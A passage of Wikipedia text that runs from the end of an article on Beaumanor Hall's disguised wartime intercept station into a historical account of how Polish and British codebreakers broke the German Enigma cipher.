sending them. A civilian from military intelligence at Bletchley Park was in charge of this room. TheRadio Direction Findingrecords room was next door and kept records of the signals' exact locations of origin. In 1940 the use of the hall for all of these different functions allowed for the required specially designed wireless set rooms to be constructed in the grounds of the hall. This was instead of converting the existing rooms within the building for this purpose. A field to the north of the hall was chosen as the ideal location to construct the new set huts. In the mid-1970s the hall was bought by Leicestershire County Council, developing quickly into a busy Conference and Education Centre. The War Office Y Group had acquired an architect who worked as part of the local staff at Beaumanor, and he was tasked with designing the set rooms and other buildings. These were to be disguised and fitted into their surroundings by being made to look like normal outbuildings associated with a country house. This form of disguise is almost unique to Beaumanor; among other sites the military used during the war only Bomber Command Headquarters atRAF High Wycombewas disguised in this way.[citation needed] A twentyacre(8.1 ha) field to the north of the hall was chosen as the appropriate site to build the required operational set rooms (huts). The huts were spaced far enough apart to avoid collateral damage should a bombing raid occur. Each hut was brick-built with blast walls, and then a disguising outer covering was put over it. The huts were disguised in different ways: one to look like a cart shed with barn (J), two to look like cottages (H&I), the fourth to look like stables (K), the fifth disguised as a glasshouse (M) block, and the sixth, Hut G, as a cricket pavilion complete with a false clock tower. To give them an identity, the huts were each given a letter of the alphabet. The four huts around the perimeter of the field were lettered H, I, J and K. These huts were to be the four set rooms, which housed the wireless receivers for intercepting messages. All of the cables and aerial feeds were located in underground ducts. Each hut had a pneumatic tube for sending the handwritten, received messages to G hut via a cylinder, which was shot down the tube. This tube system was also underground and out of sight. In order to carefully conceal them, the other huts were given wooden exteriors and located in the wooded area to the rear of the hall on its western side. These huts were lettered A, B, C, D, E and F. The wireless listeners were uniformed women of the ATS (Auxiliary Territorial Service), who had been trained on the Isle of Man. They intercepted German and Italian messages, many of which had been enciphered onEnigma machines. It was the most difficult of signals intelligence gathering, because the enciphering meant that no prediction was possible. Once gathered, the intercepts were sent by motorcycle courier to Bletchley Park, for decryption. Collectively, the women who worked at Beaumanor were known as the WOYGians.[23] 52°44′10″N1°12′18″W / 52.736116°N 1.204998°W /52.736116; -1.204998
https://en.wikipedia.org/wiki/Beaumanor_Hall
Cryptanalysis of the Enigma ciphering systemenabled the westernAlliesinWorld War IIto read substantial amounts ofMorse-codedradio communications of theAxis powersthat had been enciphered usingEnigma machines. This yieldedmilitary intelligencewhich, along with that from other decrypted Axis radio andteleprintertransmissions, was given the codenameUltra. The Enigma machines were a family of portableciphermachines withrotorscramblers.[1]Good operating procedures, properly enforced, would have made the plugboard Enigma machine unbreakable to the Allies at that time.[2][3][4] The German plugboard-equipped Enigma became the principalcrypto-systemof theGerman Reichand later of other Axis powers. In December 1932 it was broken by mathematicianMarian Rejewskiat thePolish General Staff'sCipher Bureau,[5]using mathematicalpermutation grouptheory combined with French-supplied intelligence material obtained from a German spy. By 1938 Rejewski had invented a device, thecryptologic bomb, andHenryk Zygalskihad devised hissheets, to make the cipher-breaking more efficient. Five weeks before the outbreak of World War II, in late July 1939 at a conference just south ofWarsaw, the Polish Cipher Bureau shared its Enigma-breaking techniques and technology with the French and British. During the Germaninvasion of Poland, core Polish Cipher Bureau personnel were evacuated via Romania to France, where they established thePC Brunosignals intelligence station with French facilities support. Successful cooperation among the Poles, French, and British continued until June 1940, whenFrance surrenderedto the Germans. From this beginning, the BritishGovernment Code and Cypher SchoolatBletchley Parkbuilt up an extensive cryptanalytic capability. Initially the decryption was mainly ofLuftwaffe(German air force) and a fewHeer(German army) messages, as theKriegsmarine(German navy) employed much more secure procedures for using Enigma.Alan Turing, aCambridge Universitymathematician and logician, provided much of the original thinking that led to upgrading of the Polishcryptologic bombused in decrypting German Enigma ciphers. However, theKriegsmarineintroduced an Enigma version with a fourth rotor for itsU-boats, resulting in a prolonged period when these messages could not be decrypted. With the capture of cipher keys and the use of much fasterUS Navy bombes, regular, rapid reading of U-boat messages resumed. Many commentators say the flow ofUltracommunications intelligencefrom the decrypting of Enigma,Lorenz, and other ciphers shortened the war substantially and may even have altered its outcome.[6] The Enigma machines combined multiple levels of movable rotors and plug cables to produce a particularly complexpolyalphabetic substitution cipher. DuringWorld War I, inventors in several countries realised that a purely random key sequence, containing no repetitive pattern, would, in principle, make a polyalphabetic substitution cipher unbreakable.[7]This led to the development ofrotor machineswhich alter each character in theplaintextto produce theciphertext, by means of a scrambler comprising a set ofrotorsthat alter the electrical path from character to character, between the input device and the output device. This constant altering of the electrical pathway produces a very long period before the pattern—thekey sequenceorsubstitution alphabet—repeats. Decrypting enciphered messages involves three stages, defined somewhat differently in that era than in modern cryptography.[8]First, there is theidentificationof the system in use, in this case Enigma; second,breakingthe system by establishing exactly how encryption takes place, and third,solving, which involves finding the way that the machine was set up for an individual message,i.e.themessage key.[9]Today, it is often assumed that an attacker knows how the encipherment process works (seeKerckhoffs's principle) andbreakingis often used forsolvinga key. Enigma machines, however, had so many potential internal wiring states that reconstructing the machine, independent of particular settings, was a very difficult task. The Enigma rotor machine was potentially an excellent system. It generated a polyalphabeticsubstitution cipher, with a period before repetition of the substitution alphabet that was much longer than any message, or set of messages, sent with the same key. A major weakness of the system, however, was that no letter could be enciphered to itself. This meant that some possible solutions could quickly be eliminated because of the same letter appearing in the same place in both the ciphertext and the putative piece of plaintext. Comparing the possible plaintextKeine besonderen Ereignisse(literally, "no special occurrences"—perhaps better translated as "nothing to report"; a phrase regularly used by one German outpost in North Africa), with a section of ciphertext, might produce the following: The red cells represent theseclashes. Position 2 is a possibility. The mechanism of the Enigma consisted of akeyboardconnected to abatteryand acurrent entry plateor wheel (German:Eintrittswalze), at the right hand end of the scrambler (usually via aplugboardin the military versions).[10]This contained a set of 26 contacts that made electrical connection with the set of 26 spring-loaded pins on the right hand rotor. The internal wiring of the core of each rotor provided an electrical pathway from the pins on one side to different connection points on the other. The left hand side of each rotor made electrical connection with the rotor to its left. The leftmost rotor then made contact with thereflector(German:Umkehrwalze). The reflector provided a set of thirteen paired connections to return the current back through the scrambler rotors, and eventually to the lampboard where a lamp under a letter was illuminated.[11] Whenever a key on the keyboard was pressed, thestepping motionwas actuated, advancing the rightmost rotor one position. Because it moved with each key pressed it is sometimes called thefast rotor. When a notch on that rotor engaged with apawlon the middle rotor, that too moved; and similarly with the leftmost ('slow') rotor. There are a huge number of ways that the connections within each scrambler rotor—and between the entry plate and the keyboard or plugboard or lampboard—could be arranged. For the reflector plate there are fewer, but still a large number of options to its possible wirings.[12] Each scrambler rotor could be set to any one of its 26 starting positions (any letter of the alphabet). For the Enigma machines with only three rotors, their sequence in the scrambler—which was known as thewheel order (WO)toAlliedcryptanalysts—could be selected from the six that are possible. Later Enigma models included analphabet ringlike a tyre around the core of each rotor. This could be set in any one of 26 positions in relation to the rotor's core. The ring contained one or more notches that engaged with a pawl that advanced the next rotor to the left.[13] Later still, the three rotors for the scrambler were selected from a set of five or, in the case of the German Navy, eight rotors. The alphabet rings of rotors VI, VII, and VIII contained two notches which, despite shortening the period of the substitution alphabet, made decryption more difficult. Most military Enigmas also featured aplugboard(German:Steckerbrett). This altered the electrical pathway between the keyboard and the entry wheel of the scrambler and, in the opposite direction, between the scrambler and the lampboard. It did this by exchanging letters reciprocally, so that ifAwas plugged toGthen pressing keyAwould lead to current entering the scrambler at theGposition, and ifGwas pressed the current would enter atA. The same connections applied for the current on the way out to the lamp panel. To decipher German military Enigma messages, the following information would need to be known. Logical structure of the machine(unchanging) Internal settings(usually changed less frequently than external settings) External settings(usually changed more frequently than internal settings) Discovering the logical structure of the machine may be called "breaking" it, a one-off process except when changes or additions were made to the machines. Finding the internal and external settings for one or more messages may be called "solving"[14]– although breaking is often used for this process as well. The various Enigma models provided different levels of security. The presence of a plugboard (Steckerbrett) substantially increased the security of the encipherment. Each pair of letters that were connected together by a plugboard lead were referred to asstecker partners, and the letters that remained unconnected were said to beself-steckered.[15]In general, the unsteckered Enigma was used for commercial and diplomatic traffic and could be broken relatively easily using hand methods, while attacking versions with a plugboard was much more difficult. The British read unsteckered Enigma messages sent during theSpanish Civil War,[16]and also someItalian naval trafficenciphered early in World War II. The strength of the security of the ciphers that were produced by the Enigma machine was a product of the large numbers associated with the scrambling process. However, the way that Enigma was used by the Germans meant that, if the settings for one day (or whatever period was represented by each row of the setting sheet) were established, the rest of the messages for that network on that day could quickly be deciphered.[19] The security of Enigma ciphers did have fundamental weaknesses that proved helpful to cryptanalysts. Enigma featured the major operational convenience of beingsymmetrical(orself-inverse). This meant thatdeciphermentworked in the same way asencipherment, so that when theciphertextwas typed in, the sequence of lamps that lit yielded theplaintext. Identical setting of the machines at the transmitting and receiving ends was achieved by key setting procedures. These varied from time to time and across differentnetworks. They consisted ofsetting sheetsin acodebook[24][25]which were distributed to all users of a network, and were changed regularly. The message key was transmitted in anindicator[26]as part of the message preamble. The wordkeywas also used at Bletchley Park to describe the network that used the same Enigma setting sheets. Initially these were recorded using coloured pencils and were given the namesred,light blueetc., and later the names of birds such askestrel.[27]During World War II the settings for most networks lasted for 24 hours, although some were changed more often towards the end of the war.[28]The sheets had columns specifying, for each day of the month, the rotors to be used and their positions, the ring positions and the plugboard connections. For security, the dates were in reverse chronological order down the page, so that each row could be cut off and destroyed when it was finished with.[29] Until 15 September 1938,[31]the transmitting operator indicated to the receiving operator(s) how to set their rotors, by choosing a three-lettermessage key(the key specific to that message) and enciphering it twice using the specified initial ring positions (theGrundstellung). The resultant six-letter indicator was then transmitted before the enciphered text of the message.[32]Suppose that the specifiedGrundstellungwasRAO, and the chosen three-letter message key wasIHL, the operator would set the rotors toRAOand encipherIHLtwice. The resultant ciphertext,DQYQQT, would be transmitted, at which point the rotors would be changed to the message key (IHL) and then the message itself enciphered. The receiving operator would use the specifiedGrundstellung RAOto decipher the first six letters, yieldingIHLIHL. On seeing the repeated message key, they would know there had been no corruption and useIHLto decipher the message. The weakness in thisindicator procedurecame from two factors. First, use of a globalGrundstellung; this was changed in September 1938 so that the operator selected his initial position to encrypt the message key, and sent the initial positionin clearfollowed by the enciphered message key. The second problem was the repetition of the message key within the indicator, which was a serious security flaw.[33]The message setting was encoded twice, resulting in a relation between the first and fourth, second and fifth, and third and sixth characters. This weakness enabled thePolish Cipher Bureauto break the pre-war Enigma system as early as 1932. On 1 May 1940 the Germans changed the procedures to encipher the message key only once. In 1927, the UK openly purchased a commercial Enigma. Its operation was analysed and reported. Although a leading British cryptographer,Dilly Knox(a veteran ofWorld War Iand the cryptanalytical activities of the Royal Navy'sRoom 40), worked on decipherment he had only the messages he generated himself to practice with. After Germany supplied modified commercial machines to theNationalistside in theSpanish Civil War, and with theItalian Navy(who were also aiding the Nationalists) using a version of the commercial Enigma that did not have a plugboard, Britain could intercept the radio broadcast messages. In April 1937[34]Knox made his first decryption of an Enigma encryption using a technique that he calledbuttoning upto discover the rotor wirings[35]and another that he calledroddingto solve messages.[36]This relied heavily oncribsand on a crossword-solver's expertise in Italian, as it yielded a limited number of spaced-out letters at a time. Britain had no ability to read the messages broadcast by Germany, which used the military Enigma machine.[37] In the 1920s the German military began using a 3-rotor Enigma, whose security was increased in 1930 by the addition of a plugboard.[38]ThePolish Cipher Bureausought to break it because of the threat that Poland faced from Germany, but the early attempts did not succeed. Mathematicians having earlier rendered great services in breaking Russian ciphers and codes, in early 1929 the Polish Cipher Bureau invited mathematics students at Poznań University – who had a good knowledge of the German language due to the area having belonged to Germany before being awarded to Poland after World War I – to take a course in cryptology.[39] After the course, the Bureau recruited some students to work part-time at a Bureau branch set up in Poznań. On 1 September 1932, 27-year-old mathematicianMarian Rejewskiand two fellowPoznań Universitymathematics graduates,Henryk ZygalskiandJerzy Różycki, were hired by the Bureau in Warsaw.[40]Their first task was reconstructing a four-letter German naval code.[41] Near the end of 1932 Rejewski was asked to work a couple of hours a day at breaking the Enigma cipher. His work on it may have begun in late October or early November 1932.[42] Marian Rejewski quickly spotted the Germans' major procedural weaknesses of specifying a single indicator setting (Grundstellung) for all messages on a network for a day, and repeating the operator's chosenmessage keyin the enciphered 6-letter indicator. Those procedural mistakes allowed Rejewski to decipher the message keys without knowing any of the machine's wirings. In the above example ofDQYQQTbeing the enciphered indicator, it is known that the first letterDand the fourth letterQrepresent the same letter, enciphered three positions apart in the scrambler sequence. Similarly withQandQin the second and fifth positions, andYandTin the third and sixth. Rejewski exploited this fact by collecting a sufficient set of messages enciphered with the same indicator setting, and assembling three tables for the 1,4, the 2,5, and the 3,6 pairings. Each of these tables might look something like the following: A path from one first letter to the corresponding fourth letter, then from that letter as the first letter to its corresponding fourth letter, and so on until the first letter recurs, traces out acycle group.[43]The following table contains six cycle groups. Rejewski recognised that a cycle group must pair with another group of the same length. Even though Rejewski did not know the rotor wirings or the plugboard permutation, the German mistake allowed him to reduce the number of possible substitution ciphers to a small number. For the 1,4 pairing above, there are only1×3×9=27possibilities for the substitution ciphers at positions 1 and 4. Rejewski also exploited cipher clerk laziness. Scores of messages would be enciphered by several cipher clerks, but some of those messages would have the same encrypted indicator. That meant that both clerks happened to choose the same three letter starting position. Such a collision should be rare with randomly selected starting positions, but lazy cipher clerks often chose starting positions such as "AAA", "BBB", or "CCC". Those security mistakes allowed Rejewski to solve each of the six permutations used to encipher the indicator. That solution was an extraordinary feat. Rejewski did it without knowing the plugboard permutation or the rotor wirings. Even after solving for the six permutations, Rejewski did not know how the plugboard was set or the positions of the rotors. Knowing the six permutations also did not allow Rejewski to read any messages. Before Rejewski started work on the Enigma, the French had a spy,Hans-Thilo Schmidt, who worked at Germany's Cipher Office in Berlin and had access to some Enigma documents. Even with the help of those documents, the French did not make progress on breaking the Enigma. The French decided to share the material with their British and Polish allies. In a December 1931 meeting, the French providedGwido Langer, head of the Polish Cipher Bureau, with copies of some Enigma material. Langer asked the French for more material, andGustave Bertrandof French Military Intelligence quickly obliged; Bertrand provided additional material in May and September 1932.[44]The documents included two German manuals and two pages of Enigma daily keys.[45][46] In December 1932, the Bureau provided Rejewski with some German manuals and monthly keys. The material enabled Rejewski to achieve "one of the most important breakthroughs incryptologichistory"[47]by using thetheory of permutations and groupsto work out the Enigma scrambler wiring.[48][49] Rejewski could look at a day's cipher traffic and solve for the permutations at the six sequential positions used to encipher the indicator. Since Rejewski had the cipher key for the day, he knew and could factor out the plugboard permutation. He assumed the keyboard permutation was the same as the commercial Enigma, so he factored that out. He knew the rotor order, the ring settings, and the starting position. He developed a set of equations that would allow him to solve for the rightmost rotor wiring assuming the two rotors to the left did not move.[50] He attempted to solve the equations, but failed with inconsistent results. After some thought, he realised one of his assumptions must be wrong. Rejewski found that the connections between the military Enigma's keyboard and the entry ring were not, as in the commercial Enigma, in the order of the keys on a German typewriter. He made an inspired correct guess that it was in alphabetical order.[51]Britain'sDilly Knoxwas astonished when he learned, in July 1939, that the arrangement was so simple.[52][53] With the new assumption, Rejewski succeeded in solving the wiring of the rightmost rotor. The next month's cipher traffic used a different rotor in the rightmost position, so Rejewski used the same equations to solve for its wiring. With those rotors known, the remaining third rotor and the reflector wiring were determined. Without capturing a single rotor to reverse engineer, Rejewski had determined the logical structure of the machine. The Polish Cipher Bureau then had some Enigma machine replicas made; the replicas were called"Enigma doubles". The Poles now had the machine's wiring secrets, but they still needed to determine the daily keys for the cipher traffic. The Poles would examine the Enigma traffic and use the method of characteristics to determine the six permutations used for the indicator. The Poles would then use thegrill methodto determine the rightmost rotor and its position. That search would be complicated by the plugboard permutation, but that permutation only swapped six pairs of letters – not enough to disrupt the search. The grill method also determined the plugboard wiring. The grill method could also be used to determine the middle and left rotors and their setting (and those tasks were simpler because there was no plugboard), but the Poles eventually compiled a catalogue of the3×2×26×26=4056possibleQpermutations (reflector and 2 leftmost rotor permutations), so they could just look up the answer. The only remaining secret of the daily key would be the ring settings, and the Poles would attack that problem withbrute force. Most messages would start with the three letters "ANX" (anis German for "to" and the "X" character was used as a space). It may take almost26×26×26=17576trials, but that was doable. Once the ring settings were found, the Poles could read the day's traffic. The Germans made it easy for the Poles in the beginning. The rotor order only changed every quarter, so the Poles would not have to search for the rotor order. Later the Germans changed it every month, but that would not cause much trouble, either. Eventually, the Germans would change the rotor order every day, and late in the war (after Poland had been overrun) the rotor order might be changed during the day. The Poles kept improving their techniques as the Germans kept improving their security measures. Rejewski realised that, although the letters in the cycle groups were changed by the plugboard, the number and lengths of the cycles were unaffected—in the example above, six cycle groups with lengths of 9, 9, 3, 3, 1, and 1. He described this invariant structure as thecharacteristicof the indicator setting.[dubious–discuss]There were only 105,456 possible rotor settings.[54][55]The Poles therefore set about creating acard catalogueof these cycle patterns.[56] The cycle-length method would avoid using the grill. The card catalogue would index the cycle-length for all starting positions (except for turnovers that occurred while enciphering an indicator). The day's traffic would be examined to discover the cycles in the permutations. The card catalogue would be consulted to find the possible starting positions. There are roughly 1 million possible cycle-length combinations and only 105,456 starting positions. Having found a starting position, the Poles would use an Enigma double to determine the cycles at that starting position without a plugboard. The Poles would then compare those cycles to the cycles with the (unknown) plugboard and solve for the plugboard permutation (a simple substitution cipher). Then the Poles could find the remaining secret of the ring settings with the ANX method. The problem was compiling the large card catalogue. Rejewski, in 1934 or 1935, devised a machine to facilitate making the catalogue and called it acyclometer. This "comprised two sets of rotors... connected by wires through which electric current could run. Rotor N in the second set was three letters out of phase with respect to rotor N in the first set, whereas rotors L and M in the second set were always set the same way as rotors L and M in the first set".[57]Preparation of this catalogue, using the cyclometer, was, said Rejewski, "laborious and took over a year, but when it was ready, obtaining daily keys was a question of [some fifteen] minutes".[58] However, on 1 November 1937, the Germans changed the Enigmareflector, necessitating the production of a new catalogue—"a task which [says Rejewski] consumed, on account of our greater experience, probably somewhat less than a year's time".[58] This characteristics method stopped working for German naval Enigma messages on 1 May 1937, when the indicator procedure was changed to one involving special codebooks (seeGerman Navy 3-rotor Enigmabelow).[59]Worse still, on 15 September 1938 it stopped working for German Army and Luftwaffe messages because operators were then required to choose their ownGrundstellung(initial rotor setting) for each message. Although German army message keys would still be double-enciphered, the day's keys would not be double-enciphered at the same initial setting, so the characteristic could no longer be found or exploited. Although the characteristics method no longer worked, the inclusion of the enciphered message key twice gave rise to a phenomenon that the cryptanalyst Henryk Zygalski was able to exploit. Sometimes (about one message in eight) one of the repeated letters in the message key enciphered to the same letter on both occasions. These occurrences were calledsamiczki[60](in English,females—a term later used at Bletchley Park).[61][62] Only a limited number of scrambler settings would give rise to females, and these would have been identifiable from the card catalogue. If the first six letters of the ciphertext wereSZVSIK, this would be termed a 1–4 female; ifWHOEHS, a 2–5 female; and ifASWCRW, a 3–6 female. The method was calledNetz(fromNetzverfahren, "net method"), or theZygalski sheet methodas it used perforated sheets that he devised, although at Bletchley Park Zygalski's name was not used for security reasons.[63]About ten females from a day's messages were required for success. There was a set of 26 of these sheets for each of the six possible sequenceswheel orders. Each sheet was for the left (slowest-moving) rotor. The 51×51 matrices on the sheets represented the 676 possible starting positions of the middle and right rotors. The sheets contained about 1000 holes in the positions in which a female could occur.[64]The set of sheets for that day's messages would be appropriately positioned on top of each other in theperforated sheets apparatus. Rejewski wrote about how the device was operated: When the sheets were superposed and moved in the proper sequence and the proper manner with respect to each other, in accordance with a strictly defined program, the number of visible apertures gradually decreased. And, if a sufficient quantity of data was available, there finally remained a single aperture, probably corresponding to the right case, that is, to the solution. From the position of the aperture one could calculate the order of the rotors, the setting of their rings, and, by comparing the letters of the cipher keys with the letters in the machine, likewise permutation S; in other words, the entire cipher key.[65] The holes in the sheets were painstakingly cut with razor blades and in the three months before the next major setback, the sets of sheets for only two of the possible six wheel orders had been produced.[66] AfterRejewski'scharacteristics method became useless, he invented an electro-mechanical device that was dubbed thebomba kryptologiczna, 'cryptologic bomb'. Each machine contained six sets of Enigma rotors for the six positions of the repeated three-letter key. Like the Zygalski sheet method, thebombarelied on the occurrence offemales, but required only three instead of about ten for the sheet method. Sixbomby[67]were constructed, one for each of the then possiblewheel orders. Eachbombaconducted an exhaustive (brute-force) analysis of the 17,576[68]possible message keys. Rejewski has written about the device: The bomb method, invented in the autumn of 1938, consisted largely in the automation and acceleration of the process of reconstructing daily keys. Each cryptologic bomb (six were built in Warsaw for the Biuro Szyfrów Cipher Bureau before September 1939) essentially constituted an electrically powered aggregate of six Enigmas. It took the place of about one hundred workers and shortened the time for obtaining a key to about two hours.[69] The cipher message transmitted theGrundstellungin the clear, so when abombafound a match, it revealed the rotor order, the rotor positions, and the ring settings. The only remaining secret was the plugboard permutation. On 15 December 1938, the German Army increased the complexity of Enigma enciphering by introducing two additional rotors (IV and V). This increased the number of possiblewheel ordersfrom 6 to 60.[70]The Poles could then read only the small minority of messages that used neither of the two new rotors. They did not have the resources to commission 54 more bombs or produce 58 sets of Zygalski sheets. Other Enigma users received the two new rotors at the same time. However, until 1 July 1939 theSicherheitsdienst(SD)—the intelligence agency of theSSand theNazi Party—continued to use its machines in the old way with the same indicator setting for all messages. This allowed Rejewski to reuse his previous method, and by about the turn of the year he had worked out the wirings of the two new rotors.[70]On 1 January 1939, the Germans increased the number of plugboard connections from between five and eight to between seven and ten, which made other methods of decryption even more difficult.[58] Rejewski wrote, in a 1979 critique of appendix 1, volume 1 (1979), of the official history of British Intelligence in the Second World War: we quickly found the [wirings] within the [new rotors], but [their] introduction ... raised the number of possible sequences of [rotors] from 6 to 60 ... and hence also raised tenfold the work of finding the keys. Thus the change was not qualitative but quantitative. We would have had to markedly increase the personnel to operate the bombs, to produce the perforated sheets ... and to manipulate the sheets.[71][72] As the likelihood of war increased in 1939, Britain and France pledged support for Poland in the event of action that threatened its independence.[73]In April, Germany withdrew from theGerman–Polish Non-Aggression Pactof January 1934. The Polish General Staff, realising what was likely to happen, decided to share their work on Enigma decryption with their western allies. Marian Rejewski later wrote: [I]t was not [as Harry Hinsley suggested, cryptological] difficulties of ours that prompted us to work with the British and French, but only the deteriorating political situation. If we had had no difficulties at all we would still, or even the more so, have shared our achievements with our allies as our contribution to the struggle against Germany.[71][74] At a conference near Warsaw on 26 and 27 July 1939, the Poles revealed to the French and British that they had broken Enigma and pledged to give each aPolish-reconstructed Enigma, along with details of their Enigma-solving techniques and equipment, including Zygalski's perforated sheets and Rejewski'scryptologic bomb.[75]In return, the British pledged to prepare two full sets ofZygalski sheetsfor all 60 possible wheel orders.[76]Dilly Knox was a member of the British delegation. He commented on the fragility of the Polish system's reliance on the repetition in the indicator, because it might "at any moment be cancelled".[77]In August, two Polish Enigma doubles were sent to Paris, whenceGustave Bertrandtook one to London, handing it toStewart Menziesof Britain'sSecret Intelligence ServiceatVictoria Station.[78] Gordon Welchman, who became head ofHut 6at Bletchley Park, wrote: Hut 6 Ultra would never have gotten off the ground if we had not learned from the Poles, in the nick of time, the details both of the German military version of the commercial Enigma machine, and of the operating procedures that were in use.[79] Peter Calvocoressi, who became head of the Luftwaffe section in Hut 3, wrote of the Polish contribution: The one moot point is—how valuable? According to the best qualified judges it accelerated the breaking of Enigma by perhaps a year. The British did not adopt Polish techniques but they were enlightened by them.[80] On 5 September 1939 the Cipher Bureau began preparations to evacuate key personnel and equipment from Warsaw. Soon a special evacuation train, the Echelon F, transported them eastward, then south. By the time the Cipher Bureau was ordered to cross the border into allied Romania on 17 September, they had destroyed all sensitive documents and equipment and were down to a single very crowded truck. The vehicle was confiscated at the border by a Romanian officer, who separated the military from the civilian personnel. Taking advantage of the confusion, the three mathematicians ignored the Romanian's instructions. They anticipated that in an internment camp they might be identified by the Romanian security police, in which the GermanAbwehrandSDhad informers.[81] The mathematicians went to the nearest railroad station, exchanged money, bought tickets, and boarded the first train headed south. After a dozen or so hours, they reached Bucharest, at the other end of Romania. There they went to the British embassy. Told by the British to "come back in a few days", they next tried the French embassy, introducing themselves as "friends of Bolek" (Bertrand's Polish code name) and asking to speak with a French military officer. A French Army colonel telephoned Paris and then issued instructions for the three Poles to be assisted in evacuating to Paris.[81] On 20 October 1939, atPC Brunooutside Paris, the Polish cryptologists resumed work on German Enigma ciphers, in collaboration with Bletchley Park.[82] PC Brunoand Bletchley Park worked together closely, communicating via atelegraphline secured by the use of Enigma doubles. In January 1940 Alan Turing spent several days atPC Brunoconferring with his Polish colleagues. He had brought the Poles a full set of Zygalski sheets that had been punched at Bletchley Park byJohn Jeffreysusing Polish-supplied information, and on 17 January 1940, the Poles made the first break into wartime Enigma traffic—that from 28 October 1939.[83]From that time, until theFall of Francein June 1940, 17 per cent of the Enigma keys that were found by the allies were solved atPC Bruno.[84] Just before opening their 10 May 1940 offensive against the Low Countries and France, the Germans made the feared change in the indicator procedure, discontinuing the duplication of the enciphered message key. This meant that the Zygalski sheet method no longer worked.[85][86]Instead, the cryptanalysts had to rely on exploiting theoperator weaknessesdescribed below, particularly the cillies and theHerivel tip. After the June Franco-German armistice, the Polish cryptological team resumed work in France's southernFree Zone,[87]although probably not on Enigma.[88]Marian Rejewski and Henryk Zygalski, after many travails, perilous journeys, and Spanish imprisonment, finally made it to Britain,[89]where they were inducted into the Polish Army and put to work breaking GermanSSandSDhand ciphers at a Polish signals facility inBoxmoor. Due to their having been in occupied France, it was thought too risky to invite them to work at Bletchley Park.[90] After the German occupation ofVichy France, several of those who had worked atPC Brunowere captured by the Germans. Despite the dire circumstances in which some of them were held, none betrayed the secret of Enigma's decryption.[91] Apart from some less-than-ideal inherent characteristics of the Enigma, in practice the system's greatest weakness was the large numbers of messages and some ways that Enigma was used. The basic principle of this sort of enciphering machine is that it should deliver a stream of transformations that are difficult for a cryptanalyst to predict. Some of the instructions to operators, and operator sloppiness, had the opposite effect. Without these operating shortcomings, Enigma would almost certainly not have been broken.[92] The shortcomings that Allied cryptanalysts exploited included: Other useful shortcomings that were discovered by the British and later the American cryptanalysts included the following, many of which depended on frequent solving of a particular network: Mavis Lever, a member ofDilly Knox's team, recalled an occasion when there was an unusual message, from the Italian Navy, whose exploitation led to the British victory at theBattle of Cape Matapan. The one snag with Enigma of course is the fact that if you pressA, you can get every other letter butA. I picked up this message and—one was so used to looking at things and making instant decisions—I thought: 'Something's gone. What has this chap done? There is not a singleLin this message.' My chap had been told to send out a dummy message and he had just had a fag [cigarette] and pressed the last key on the keyboard, theL. So that was the only letter that didn't come out. We had got the biggest crib we ever had, the encypherment wasLLLL, right through the message and that gave us the new wiring for the wheel [rotor]. That's the sort of thing we were trained to do. Instinctively look for something that had gone wrong or someone who had done something silly and torn up the rule book.[106] Postwar debriefings ofGerman cryptographic specialists, conducted as part of projectTICOM, tend to support the view that the Germans were well aware that the un-steckered Enigma was theoretically solvable, but thought that the steckered Enigma had not been solved.[4] The termcribwas used at Bletchley Park to denote anyknown plaintextorsuspected plaintextat some point in an enciphered message. Britain's Government Code and Cipher School (GC&CS), before its move to Bletchley Park, had realised the value of recruiting mathematicians and logicians to work in codebreaking teams. Alan Turing, a Cambridge University mathematician with an interest in cryptology and in machines for implementing logical operations—and who was regarded by many as a genius—had started work for GC&CS on a part-time basis from about the time of theMunich Crisisin 1938.[107]Gordon Welchman, another Cambridge mathematician, had also received initial training in 1938,[108]and they both reported to Bletchley Park on 4 September 1939, the day after Britain declared war on Germany. Most of the Polish success had relied on the repetition within the indicator. But as soon as Turing moved to Bletchley Park—where he initially joined Dilly Knox in the research section—he set about seeking methods that did not rely on this weakness, as they correctly anticipated that the German Army and Air Force might follow the German Navy in improving their indicator system. The Poles had used an early form of crib-based decryption in the days when only six leads were used on the plugboard.[59]The technique became known as theForty Weepy Weepymethod for the following reason. When a message was a continuation of a previous one, the plaintext would start withFORT(fromFortsetzung, meaning "continuation") followed by the time of the first message given twice bracketed by the letterY. At this time numerals were represented by the letters on the top row of the Enigma keyboard. So, "continuation of message sent at 2330" was represented asFORTYWEEPYYWEEPY. Cribswere fundamental to the British approach to solving Enigma keys, but guessing the plaintext for a message was a highly skilled business. So in 1940Stuart Milner-Barryset up a specialCrib Roomin Hut 8.[109][110] Foremost among the knowledge needed for identifying cribs was the text of previous decrypts. Bletchley Park maintained detailed indexes[111]of message preambles, of every person, of every ship, of every unit, of every weapon, of every technical term, and of repeated phrases such as forms of address and other German military jargon.[112]For each message thetraffic analysisrecorded the radio frequency, the date and time of intercept, and the preamble—which contained the network-identifying discriminant, the time of origin of the message, the callsign of the originating and receiving stations, and the indicator setting. This allowed cross referencing of a new message with a previous one.[113]Thus, asDerek Taunt, another Cambridge mathematician-cryptanalyst wrote, the truism that "nothing succeeds like success" is particularly apposite here.[100] Stereotypical messages includedKeine besonderen Ereignisse(literally, "no special occurrences"—perhaps better translated as "nothing to report"),[114]An die Gruppe("to the group")[115]and a number that came from weather stations such asweub null seqs null null("weather survey 0600"). This was actually rendered asWEUBYYNULLSEQSNULLNULL. The wordWEUBbeing short forWetterübersicht,YYwas used as a separator, andSEQSwas common abbreviation ofsechs(German for "six").[116]As another example, Field MarshalErwin Rommel's Quartermaster started all of his messages to his commander with the same formal introduction.[117] With a combination of probable plaintext fragment and the fact that no letter could be enciphered as itself, a corresponding ciphertext fragment could often be tested by trying every possible alignment of the crib against the ciphertext, a procedure known ascrib-dragging. This, however, was only one aspect of the processes of solving a key. Derek Taunt has written that the three cardinal personal qualities that were in demand for cryptanalysis were (1) a creative imagination, (2) a well-developed critical faculty, and (3) a habit of meticulousness.[118]Skill at solving crossword puzzles was famously tested in recruiting some cryptanalysts. This was useful in working out plugboard settings when a possible solution was being examined. For example, if the crib was the wordWETTER(German for "weather") and a possible decrypt before the plugboard settings had been discovered, wasTEWWER, it is easy to see thatTwithWarestecker partners.[119]These examples, although illustrative of the principles, greatly over-simplify the cryptanalysts' tasks. A fruitful source of cribs was re-encipherments of messages that had previously been decrypted either from a lower-level manual cipher or from another Enigma network.[120]This was called akissand happened particularly with German naval messages being sent in thedockyard cipherand repeatedverbatimin an Enigma cipher. One German agent in Britain,Nathalie Sergueiew, code-namedTreasure, who had been'turned'to work for the Allies, was very verbose in her messages back to Germany, which were then re-transmitted on theAbwehrEnigma network. She was kept going byMI5because this provided long cribs, not because of her usefulness as an agent to feed incorrect 